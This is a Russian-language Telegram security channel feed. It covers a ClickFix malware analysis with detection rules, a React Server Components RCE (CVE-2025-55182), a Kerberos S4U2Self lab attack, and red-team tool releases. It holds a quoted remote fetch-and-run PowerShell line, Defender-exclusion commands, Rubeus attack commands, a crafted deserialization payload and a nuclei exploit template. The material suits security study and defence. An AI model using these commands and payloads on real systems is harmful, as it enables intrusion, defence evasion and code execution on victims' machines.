Forwarded from Detection is easy
Всем привет! 💻 ✌️
Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании
👨💻 Посмотрим TTP:
🔤 Атака начинается с
🔤 Приложение
🔤 Теперь самое интересное. Скачанный
🔤 Для повышения привилегий атакующие запускают
И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии
🔤 Последним этапом идёт установка RAT или стилера
🔭 Обнаружение:
🔤 отслеживаем аргументы powershell
🔤 отслеживаем создание новых значений в ключах реестра
🔤 отслеживаем события
#detection@detectioneasy
#ttp@detectioneasy
Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании
ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exehta запускает powershell.exe с командлетами iex (irm https://example.com/asf)ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender
$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'
powershell.exe с аргументом -Verb RunAs
$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
-Verb RunAs `
-PassThru
И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии
Add-MpPreference, Set-MpPreference, -Exclusion*HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Acronis
Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix
Acronis TRU researchers have discovered an ongoing campaign that leverages a novel combination of screen hijacking techniques with ClickFix, displaying a realistic, full-screen Windows Update of “Critical Windows Security Updates” to trick victims into executing…
🔥5
Вышел релиз лучшего open-source C2
Обзоры
UPD 0.11:
Изменения
Переход на Go 1.25.x
Добавлены крутые BOF'ы
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
sudo apt install mingw-w64 make gcc g++ g++-mingw-w64
wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
# for windows 7 support by gopher agent
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/
sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-base-private-dev libxkbcommon-dev qt6-websockets-dev qt6-declarative-dev
make server-ext
make client
#adaptixc2 #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
😎3👍2❤1
xbz0n.sh
Living Off the Land: Windows Post-Exploitation Without Tools
I'll never forget one of my first red team engagements where I learned this lesson the hard way. I'd spent two days carefully phishing my way into a financia...
Пост эксплуатация Windows без использования сторонних инструментов, в основном там
Understanding Living Off the Land
The term comes from the military concept of living off the land during operations - using local resources instead of bringing your own supplies. In cybersecurity, it refers to using built-in system tools and legitimate executables for malicious purposes. These binaries are often called LOLBins (Living Off the Land Binaries) or LOLBAs (Living Off the Land Binaries and Scripts
#redteam #windows #lolbins #powershell #wmi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Инструмент для анализа и проектирования сетевой инфраструктуры. Будет полезен пентестерам, сетевым инженерам, системным администраторам.
UPD
Возможности:
Работа с веб-интерфейсом
Табличное представление данных
Экспорт данных
Скриншот веб-ресурса
Поиск ПО по узлам сети
Сканирование с использованием nmap, masscan и scapy
Парсинг pcap-файлов
Интеграция с search-vulns
Формирование отчёта по найденным уязвимостям
Поиск по SNMP
Построение карты сети
Поиск субдоменов через DNS
HTTP REST API
Установка и запуск:
sudo apt install ./setezor_<ver>.deb
# Переменные окружения
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef
# Сервер
setezor
# Агент
setezor -s -p <port>
#setezor #network
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Forwarded from Offensive Xwitter
😈 [ SpecterOps @SpecterOps ]
NTLM relays failing because of EPA? 😒
@zyn3rgy & @Tw1sm break down how to enumerate EPA settings across more protocols + drop new tooling (RelayInformer) to make relays predictable.
Blog:
🔗 https://specterops.io/blog/2025/11/25/less-praying-more-relaying-enumerating-epa-enforcement-for-mssql-and-https/
Tool:
🔗 https://github.com/zyn3rgy/RelayInformer
🐥 [ tweet ]
NTLM relays failing because of EPA? 😒
@zyn3rgy & @Tw1sm break down how to enumerate EPA settings across more protocols + drop new tooling (RelayInformer) to make relays predictable.
Blog:
🔗 https://specterops.io/blog/2025/11/25/less-praying-more-relaying-enumerating-epa-enforcement-for-mssql-and-https/
Tool:
🔗 https://github.com/zyn3rgy/RelayInformer
🐥 [ tweet ]
🔥2👍1
Python and BOF utilites to the determine EPA enforcement levels of popular NTLM relay targets from the offensive perspective
#windows #relay
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Forwarded from CyberSecrets
This media is not supported in your browser
VIEW IN TELEGRAM
Права на сброс пароля компьютеру
Неделю назад в чате RedTeam Brazzers один из участников задал вопрос, если есть права на сброс пароля для объекта компьютер, то единственный вектор эксплуатации только при условии, что компьютер имеет какие-то привилегии на другие объекты. Я предположил, что можно попробовать выписывать TGT билеты до того момента как администраторы вернут машине доверие в домене (сбросят пароль через сам компьютер), дальше использовать этот TGT билет Kerberos (пока он валидный) для получения доступа на хост через S4U2Self. Мне ответили, что пройти аутентификацию уже будет невозможно.
Сначала я согласился с этим ответом, но сама мысль не давала мне покоя. Я решил проверить свою гипотезу в лаборатории. В результате записал демо, в котором видно, что после восстановления доверия между компьютером (пароль меняется) все еще можно выполнять технику S4U2Self со «старым» TGT билетом Kerberos.
Последовательность команд
По умолчанию срок жизни TGT билета Kerberos 10 часов для обычных учетных записей и 4 часа для входящих в группу Protected Users. Но компьютеры не будут входить в эту группу.
Данная вектор нарушает работу хоста и должен выполняться по согласованию с заказчиком.
#Внутрянка #ActiveDirectory
Неделю назад в чате RedTeam Brazzers один из участников задал вопрос, если есть права на сброс пароля для объекта компьютер, то единственный вектор эксплуатации только при условии, что компьютер имеет какие-то привилегии на другие объекты. Я предположил, что можно попробовать выписывать TGT билеты до того момента как администраторы вернут машине доверие в домене (сбросят пароль через сам компьютер), дальше использовать этот TGT билет Kerberos (пока он валидный) для получения доступа на хост через S4U2Self. Мне ответили, что пройти аутентификацию уже будет невозможно.
Сначала я согласился с этим ответом, но сама мысль не давала мне покоя. Я решил проверить свою гипотезу в лаборатории. В результате записал демо, в котором видно, что после восстановления доверия между компьютером (пароль меняется) все еще можно выполнять технику S4U2Self со «старым» TGT билетом Kerberos.
Последовательность команд
$object = [ADSI]"LDAP://CN=WS-238,CN=Computers,DC=domain,DC=local"
$object.Invoke("SetPassword", "Qwerty123")
$object.CommitChanges()
.\Rubeus.exe asktgt /user:ws-238$ /password:Qwerty123 /domain:domain.local /dc:dc01.domain.local /outfile:ws-238.kirbi
# Ждем, когда администраторы восстановят доверие между доменом и компьютером
# Test-ComputerSecureChannel -Repair -Credential (Get-Credential)
.\Rubeus.exe purge # можно использовать runas.exe /netonly
.\Rubeus.exe s4u /impersonateuser:admin /self /altservice:http/ws-238 /user:ws-238$ /domain:domain.local /dc:dc01.domain.local /ptt /ticket:ws-238.kirbi
Enter-PSSession ws-238
По умолчанию срок жизни TGT билета Kerberos 10 часов для обычных учетных записей и 4 часа для входящих в группу Protected Users. Но компьютеры не будут входить в эту группу.
Данная вектор нарушает работу хоста и должен выполняться по согласованию с заказчиком.
#Внутрянка #ActiveDirectory
👍8❤1
Stealth redirector for your red team operation security
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors
#c2 #redteam #proxy #redirector
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from Cybred
🔥 10/10 React4shell
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Just when I thought the day was over… CVE-2025-55182 shows up 🫠
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
react.dev
Critical Security Vulnerability in React Server Components – React
The library for web and native user interfaces
❤1🔥1
GitHub
GitHub - ejpir/CVE-2025-55182-research: CVE-2025-55182 POC
CVE-2025-55182 POC. Contribute to ejpir/CVE-2025-55182-research development by creating an account on GitHub.
PoC к данной CVE
Уязвимые версии:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 15.x, 16.x (App Router)
Ожидаемый вывод:
=== CVE-2025-55182 - RCE via vm.runInThisContext ===
Test 1: Direct call to vm#runInThisContext with code
1+1 = {"success":true,"result":"2"}
Test 2: vm.runInThisContext with require
RCE attempt: {"success":true,"result":"uid=501(nick) gid=20(staff)..."}
Шаблон для nuclei:
id: CVE-2025-55182
info:
name: React Server Components RCE - CVE-2025-55182
author: sickwell
severity: critical
description: |
Remote Code Execution vulnerability in React Server Components via react-server-dom-webpack.
Missing hasOwnProperty check in requireModule allows prototype chain access to Node.js modules.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182
- https://github.com/ejpir/CVE-2025-55182-poc
classification:
cve-id: CVE-2025-55182
cwe-id: CWE-20
tags: cve,cve2025,rce,react,server-components,nodejs
variables:
boundary: "----NucleiBoundary{{randstr}}"
math_code: "Math.PI * 2"
expected_result: "6.283185307179586"
http:
- method: POST
path:
- "{{BaseURL}}/formaction"
- "{{BaseURL}}/api/formaction"
- "{{BaseURL}}/api/v1/login"
- "{{BaseURL}}/actions"
- "{{BaseURL}}/server-actions"
headers:
Content-Type: "multipart/form-data; boundary={{boundary}}"
User-Agent: "Nuclei - CVE-2025-55182"
body: |
--{{boundary}}
Content-Disposition: form-data; name="$ACTION_REF_0"
--{{boundary}}
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["{{math_code}}"]}
--{{boundary}}--
extractors:
- type: regex
name: vulnerable_path
part: url
regex:
- '(/(?:formaction|api/formaction|api/v1/login|actions|server-actions))'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
- 'contains(body, "result")'
- 'contains(body, "{{expected_result}}")'
condition: and
matchers-condition: and
#cve #poc #react #webpentest #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2
Причина сокращения срока действия сертификатов в новых требованиях ассоциации CA/Browser Forum, выработанные в ходе совместной работы производителей браузеров и удостоверяющих центров
Ладно, есть Certbot, так что не паримся
🔗 Site
💻 Repo
#letsencrypt #certificate #certbot
✈️ Whitehat Lab 💬 Chat
Ладно, есть Certbot, так что не паримся
#letsencrypt #certificate #certbot
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from HaHacking
CVE-2025-55182 / CVE-2025-66478)?Исходя из обновлённых react2shell.com (ресурс от автора CVE) и репозитория msanft/CVE-2025-55182, на данный момент имеем следующее: подтверждается, что наконец стали распространяться валидные PoC, не требующие подключения
vm#runInThisContext, child_process#exec, fs#writeFile и им подобных;Сервер и клиент обмениваются чанками, передавая их через
form-data — причём чанки могут содержать ссылки друг на друга. До этого коммита не проверялось, принадлежит ли ключ объекту — можно было добраться до прототипа;С помощью нагрузки вроде"$1:__proto__:constructor:constructor"можно получить[Function: Function]— глобальный конструктор;
Если чанк имеет поле
then, то уязвимый сервер думает, что это промис — делает await decodeReplyFromBusboy(...) и вызывает then(resolve, reject);Соответственно, можем сформировать специальный объект, гдеthenуказывал бы наFunction.
files = {
"0": (None, '{"then":"$1:__proto__:constructor:constructor"}'),
"1": (None, '{"x":1}'),
}getChunck берёт чанк с ID=0 как корневой для разбора ссылок;$@) можно сослаться из чанка ID=1 на чанк ID=0, который вернул бы сырой чанк вместо разобранного объекта;.status вредоносного чанка = "resolved_model", мы попадаем в initializeModelChunk — где .value парсится как JSON, резолвятся ссылки и вызывается reviveModel, куда передаётся _response из чанка; $B происходит вызов response._formData.get(response._prefix + obj);._formData — указываем на конструктор Function, а в ._prefix — на произвольный код;response._formData.get(response._prefix + "0") превратится в Function("█████████") crafted_chunk = {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then": "$B0"}',
"_response": {
"_prefix": f"███████████████████;",
"_formData": {
"get": "$1:constructor:constructor",
},
},
}
files = {
"0": (None, json.dumps(crafted_chunk)),
"1": (None, '"$@0"'),
}Разбирая полезную нагрузку по пунктам:
▪️ "then": "$1:__proto__:then"➡️ чтобы чанкID=0переписал собственный.then();▪️ "status": "resolved_model"➡️ чтобыChunk.prototype.thenперешёл к выполнениюinitializeModelChunk;▪️ "reason": -1➡️ чтобы не упасть на моментеtoStringвinitializeModelChunk;▪️ "value": '{"then": "$B0"}'➡️ чтобы после второго прохода десериализации превратить в thenable и добраться доresponse._formData.get(response._prefix + obj);▪️ "_prefix"➡️ здесь произвольный код для выполнения;▪️ "_formData"➡️ здесь указываем на конструктор;
CVE-2025-55182Уязвимые версии: от React 19 до React 19.2.0
Починили в React 19.2.1
Починили тут: facebook/react/commit/7dc903cd29dac55efb4424853fd0442fef3a8700
Объявили тут: react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
CVE-2025-66478Уязвимые версии: от Next.js 15 до Next.js 16
Починили в этих версиях
Починили тут: vercel/next.js/commit/6ef90ef49fd32171150b6f81d14708aa54cd07b2
Объявили тут: nextjs.org/blog/CVE-2025-66478
Здесь и здесь — подробный разбор причины, следствия и эксплуатации, а также PoC от сильного тайваньского CTF'ера:
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"█████████████;","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤3
CVE-2025-55182 is a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) affecting Next.js applications using App Router with Server Actions
The vulnerability exists in the Flight protocol deserialization process, allowing attackers to achieve arbitrary code execution through prototype pollution
Msf:
use multi/http/react2shell_cve_2025_55102
BurpSuite ActiveScan++ детектит React2Shell
#cve #poc #nextjs #react
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2
Forwarded from wr3dmast3r vs pentest
Данный материал подготовлен мной совместно с моим учеником для всех, кто пытается начать свой путь в области безопасности веб-приложений ☺️
На мой взгляд, PortSwigger является фаворитом среди всех обучающих материалов по информационной безопасности, и мне бы хотелось, чтобы вы в первую очередь пользовались именно бесплатными источниками знаний, а не платили за сомнительные курсы. Тем более, что большинство курсов на русском языке и так заимствуют значительную часть материалов, представленных здесь🤓
Дальнейшее развитие репозитория возможно с вашей помощью: каждый из вас может внести вклад, добавляя решения лабораторных работ. Со своей стороны я буду по мере сил пополнять разделы, и вместе мы сделаем вход в изучение веб-безопасности бесплатным и доступным для каждого🎧
Подробнее
На мой взгляд, PortSwigger является фаворитом среди всех обучающих материалов по информационной безопасности, и мне бы хотелось, чтобы вы в первую очередь пользовались именно бесплатными источниками знаний, а не платили за сомнительные курсы. Тем более, что большинство курсов на русском языке и так заимствуют значительную часть материалов, представленных здесь
Дальнейшее развитие репозитория возможно с вашей помощью: каждый из вас может внести вклад, добавляя решения лабораторных работ. Со своей стороны я буду по мере сил пополнять разделы, и вместе мы сделаем вход в изучение веб-безопасности бесплатным и доступным для каждого
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤5🔥4
Cross-platform and cross-compiled BloodHound collector tool written in Rust, making it compatible with Linux, Windows, and macOS. It therefore generates all the JSON files that can be analyzed by BloodHound Community Edition
Работает с BloodHound-CE
Установка:
# Install from cargo
cargo install rusthound-ce
Сбор:
rusthound-ce -i 192.168.1.10 -d domain.local -u [email protected] -p 'pass' -z
#rusthound #soft #bloodhound #rust
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from Adaptix Framework
Еще один блог, где автор описал свой процесс создания Linux агента на Perl.
https://p0142.github.io/posts/lamperlv1/
https://p0142.github.io/posts/lamperlv1/
Polar’s Place
Lessons from Perlyite(Building a custom Adaptix agent)
Process of developing a custom agent for the Adaptix C2. Creating a listener, getting a callback, and basic command execution.
👍3
GitHub
GitHub - P0142/LDAP-Bof-Collection: Collection of many ldap bofs for domain enumeration and privilege escalation. Created for use…
Collection of many ldap bofs for domain enumeration and privilege escalation. Created for use with the Adaptix C2. - P0142/LDAP-Bof-Collection
Коллекция LDAP BOF'ов для сбора инфы и повышения привилегий в
Написаны для AdaptixC2
Фичи:
40+ BOF commands
LDAPS support (port 636) with automatic certificate acceptance
Standard LDAP (port 389) with signing and sealing
Automatic DN/username detection for flexible targeting
Adaptix C2 integration via AxScript
Установка:
git clone https://github.com/P0142/ldap-bof-collection.git
cd ldap-bof-collection
make
AxScript tab -> Script Manager -> Right click, Load New (ldap.axs)
#redteam #pentest #soft #ad #adaptix
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Akamai researchers analyzed Microsoft’s patch for the vulnerability known as BadSuccessor (CVE-2025-53779) to assess its effectiveness
Детекты:
System access control lists (SACLs): Audit the creation of dMSAs and changes to the migration link attributes on both sides — the dMSA’s link and the superseded/preceding account’s link
Repeated log entries indicating a dMSA password has been fetched in a short window
An enabled user appearing to be linked to a dMSA (should be unusual)
A previously disabled user getting linked to a new dMSA
Подробнее для SOC
#windows #ad #badsuccessor
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥1